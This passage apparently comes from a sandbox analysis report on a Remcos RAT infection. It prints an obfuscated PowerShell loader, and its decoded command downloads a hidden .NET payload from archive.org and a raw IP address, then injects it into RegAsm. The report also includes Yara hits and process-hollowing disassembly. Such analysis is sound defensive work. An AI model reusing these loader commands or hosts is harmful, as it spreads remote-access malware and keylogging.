?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?QwBT? ? ? ? ?EU? ? ? ? ?R? ? ? ? ?BS? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?y? ? ? ? ?DI? ? ? ? ?Lw? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?Dc? ? ? ? ?Mw? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?NQ? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?1? ? ? ? ?Dg? ? ? ? ?MQ? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?OgBw? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?FI? ? ? ? ?ZQBn? ? ? ? ?EE? ? ? ? ?cwBt? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                            Imagebase:0x380000
                                                                                            File size:427'008 bytes
                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:08:00:13
                                                                                            Start date:27/09/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                                                            Imagebase:0x380000
                                                                                            File size:427'008 bytes
                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:08:00:18
                                                                                            Start date:27/09/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                            Imagebase:0xed0000
                                                                                            File size:64'704 bytes
                                                                                            MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Executed Functions

                                                                                              Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.377952028.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_19d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6e4500e4b16e52b9c4df5457dcc54120d6e8a534b01c9738a1f86ad5d28d961
                                                                                              • Instruction ID: ea155a561f0b435fb77377b1e97e1d0fbfe34b8756c2608ddef332c46704a79f
                                                                                              • Opcode Fuzzy Hash: b6e4500e4b16e52b9c4df5457dcc54120d6e8a534b01c9738a1f86ad5d28d961
                                                                                              • Instruction Fuzzy Hash: D701A271504340EBEB204E26ECC4B67FF98EF517A4F2C851AFC890B286C3799845CAB1
                                                                                              Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.377952028.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_19d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4d1ae6844aea8856ed8fbd49a17f959223a05ccfc5e2b10d437e6f88b10ec4e9
                                                                                              • Instruction ID: 51cd4ca819327201df9305b8449bf86fac9ffcd3403759e434fc7267c271a3b1
                                                                                              • Opcode Fuzzy Hash: 4d1ae6844aea8856ed8fbd49a17f959223a05ccfc5e2b10d437e6f88b10ec4e9
                                                                                              • Instruction Fuzzy Hash: 86F06D71504344AFEB208E16DCC8BA2FF98EB91764F18C55AED884F286C3799C44CAB1

                                                                                              Execution Graph

                                                                                              Execution Coverage:10.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:58.7%
                                                                                              Total number of Nodes:46
                                                                                              Total number of Limit Nodes:2
                                                                                              execution_graph 4699 224b40 4700 224b67 4699->4700 4703 224c90 4700->4703 4704 224cba 4703->4704 4705 224c7c 4704->4705 4708 224d48 4704->4708 4724 224d58 4704->4724 4709 224d8b 4708->4709 4740 22172c 4709->4740 4711 224f54 4712 221738 Wow64SetThreadContext 4711->4712 4714 225053 4711->4714 4712->4714 4713 221774 WriteProcessMemory 4718 22537c 4713->4718 4714->4713 4715 22561b 4716 221774 WriteProcessMemory 4715->4716 4717 22566c 4716->4717 4719 221780 Wow64SetThreadContext 4717->4719 4721 22576f 4717->4721 4718->4715 4720 221774 WriteProcessMemory 4718->4720 4719->4721 4720->4718 4722 221798 ResumeThread 4721->4722 4723 225821 4722->4723 4723->4704 4725 224d8b 4724->4725 4726 22172c CreateProcessW 4725->4726 4727 224f54 4726->4727 4730 225053 4727->4730 4755 221738 4727->4755 4744 221774 4730->4744 4731 22561b 4732 221774 WriteProcessMemory 4731->4732 4733 22566c 4732->4733 4737 22576f 4733->4737 4748 221780 4733->4748 4734 22537c 4734->4731 4736 221774 WriteProcessMemory 4734->4736 4736->4734 4752 221798 4737->4752 4741 225930 CreateProcessW 4740->4741 4743 225b24 4741->4743 4743->4743 4745 225f98 WriteProcessMemory 4744->4745 4747 226078 4745->4747 4747->4734 4749 225c68 Wow64SetThreadContext 4748->4749 4751 225d24 4749->4751 4751->4737 4753 2260d8 ResumeThread 4752->4753 4754 225821 4753->4754 4754->4704 4756 225c68 Wow64SetThreadContext 4755->4756 4758 225d24 4756->4758 4758->4730

                                                                                              Executed Functions

                                                                                              Function 00224D58 Relevance: .7, Instructions: 658COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 458 224d58-224d89 459 224d90-224ec6 458->459 460 224d8b 458->460 465 224ec8 459->465 466 224ecd-224f02 459->466 460->459 465->466 468 224f04-224f2e 466->468 469 224f2f-224f74 call 22172c 466->469 468->469 473 224f76-224f92 469->473 474 224f9d-224fc3 469->474 473->474 477 224fc5 474->477 478 224fca-22500c 474->478 477->478 482 225013-22503f 478->482 483 22500e 478->483 485 2250a0-2250d1 call 221744 482->485 486 225041-225073 call 221738 482->486 483->482 491 2250d3-2250ef 485->491 492 2250fa-225104 485->492 493 225075-225091 486->493 494 22509c-22509e 486->494 491->492 495 225106 492->495 496 22510b-22512e 492->496 493->494 494->492 495->496 497 225130 496->497 498 225135-225179 call 221750 496->498 497->498 505 2251a2-2251ab 498->505 506 22517b-225197 498->506 507 2251d7-2251d9 505->507 508 2251ad-2251d5 call 22175c 505->508 506->505 511 2251df-2251f3 507->511 508->511 513 2251f5-225211 511->513 514 22521c-225226 511->514 513->514 515 225228 514->515 516 22522d-225251 514->516 515->516 521 225253 516->521 522 225258-2252aa call 221768 516->522 521->522 526 2252c2-2252c4 522->526 527 2252ac-2252c0 522->527 528 2252ca-2252de 526->528 527->528 529 2252e0-22531a call 221768 528->529 530 22531b-225335 528->530 529->530 532 225337-225353 530->532 533 22535e-22539c call 221774 530->533 532->533 538 2253c5-2253cf 533->538 539 22539e-2253ba 533->539 541 2253d1 538->541 542 2253d6-2253e6 538->542 539->538 541->542 544 2253e8 542->544 545 2253ed-225415 542->545 544->545 548 225417 545->548 549 22541c-22542b 545->549 548->549 550 2255f6-225615 549->550 551 225430-22543e 550->551 552 22561b-225642 550->552 553 225440 551->553 554 225445-22546c 551->554 556 225644 552->556 557 225649-22568c call 221774 552->557 553->554 560 225473-22549a 554->560 561 22546e 554->561 556->557 563 2256b5-2256bf 557->563 564 22568e-2256aa 557->564 566 2254a1-2254d5 560->566 567 22549c 560->567 561->560 568 2256c1 563->568 569 2256c6-2256f3 563->569 564->563 574 2255c1-2255ce 566->574 575 2254db-2254e9 566->575 567->566 568->569 576 225700-22570c 569->576 577 2256f5-2256ff 569->577 578 2255d0 574->578 579 2255d5-2255e9 574->579 580 2254f0-2254f7 575->580 581 2254eb 575->581 582 225713-225723 576->582 583 22570e 576->583 577->576 578->579 586 2255f0 579->586 587 2255eb 579->587 588 2254f9 580->588 589 2254fe-225546 580->589 581->580 584 225725 582->584 585 22572a-22575b 582->585 583->582 584->585 592 2257bc-2257ed call 22178c 585->592 593 22575d-22576a call 221780 585->593 586->550 587->586 588->589 597 225548 589->597 598 22554d-225572 call 221774 589->598 604 225816-22581c call 221798 592->604 605 2257ef-22580b 592->605 599 22576f-22578f 593->599 597->598 607 225577-225597 598->607 602 225791-2257ad 599->602 603 2257b8-2257ba 599->603 602->603 603->604 608 225821-225841 604->608 605->604 609 2255c0 607->609 610 225599-2255b5 607->610 613 225843-22585f 608->613 614 22586a-22590d 608->614 609->574 610->609 613->614
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextMemoryProcessThreadWow64Write
                                                                                              • String ID:
                                                                                              • API String ID: 3696009080-0
                                                                                              • Opcode ID: 922a20106eb0ad97a3d0f4fd909b96e7861b8063aafa416c6ced4e752f9eac5e
                                                                                              • Instruction ID: f49659dbb461d78b80aaece91c4fd5900b746ddaf43c25e13ffab3698e5abfc8
                                                                                              • Opcode Fuzzy Hash: 922a20106eb0ad97a3d0f4fd909b96e7861b8063aafa416c6ced4e752f9eac5e
                                                                                              • Instruction Fuzzy Hash: E662E074D112399FEB68DF65D884BEDBBB2AB89300F5081EAD40DA7290DB305E91CF50
                                                                                              Function 00224D48 Relevance: .5, Instructions: 521COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 624 224d48-224d89 625 224d90-224ec6 624->625 626 224d8b 624->626 631 224ec8 625->631 632 224ecd-224f02 625->632 626->625 631->632 634 224f04-224f2e 632->634 635 224f2f-224f74 call 22172c 632->635 634->635 639 224f76-224f92 635->639 640 224f9d-224fc3 635->640 639->640 643 224fc5 640->643 644 224fca-22500c 640->644 643->644 648 225013-22503f 644->648 649 22500e 644->649 651 2250a0-2250d1 call 221744 648->651 652 225041-225073 call 221738 648->652 649->648 657 2250d3-2250ef 651->657 658 2250fa-225104 651->658 659 225075-225091 652->659 660 22509c-22509e 652->660 657->658 661 225106 658->661 662 22510b-22512e 658->662 659->660 660->658 661->662 663 225130 662->663 664 225135-225179 call 221750 662->664 663->664 671 2251a2-2251ab 664->671 672 22517b-225197 664->672 673 2251d7-2251d9 671->673 674 2251ad-2251d5 call 22175c 671->674 672->671 677 2251df-2251f3 673->677 674->677 679 2251f5-225211 677->679 680 22521c-225226 677->680 679->680 681 225228 680->681 682 22522d-225251 680->682 681->682 687 225253 682->687 688 225258-2252aa call 221768 682->688 687->688 692 2252c2-2252c4 688->692 693 2252ac-2252c0 688->693 694 2252ca-2252de 692->694 693->694 695 2252e0-22531a call 221768 694->695 696 22531b-225335 694->696 695->696 698 225337-225353 696->698 699 22535e-22539c call 221774 696->699 698->699 704 2253c5-2253cf 699->704 705 22539e-2253ba 699->705 707 2253d1 704->707 708 2253d6-2253e6 704->708 705->704 707->708 710 2253e8 708->710 711 2253ed-225415 708->711 710->711 714 225417 711->714 715 22541c-22542b 711->715 714->715 716 2255f6-225615 715->716 717 225430-22543e 716->717 718 22561b-225642 716->718 719 225440 717->719 720 225445-22546c 717->720 722 225644 718->722 723 225649-22568c call 221774 718->723 719->720 726 225473-22549a 720->726 727 22546e 720->727 722->723 729 2256b5-2256bf 723->729 730 22568e-2256aa 723->730 732 2254a1-2254d5 726->732 733 22549c 726->733 727->726 734 2256c1 729->734 735 2256c6-2256f3 729->735 730->729 740 2255c1-2255ce 732->740 741 2254db-2254e9 732->741 733->732 734->735 742 225700-22570c 735->742 743 2256f5-2256ff 735->743 744 2255d0 740->744 745 2255d5-2255e9 740->745 746 2254f0-2254f7 741->746 747 2254eb 741->747 748 225713-225723 742->748 749 22570e 742->749 743->742 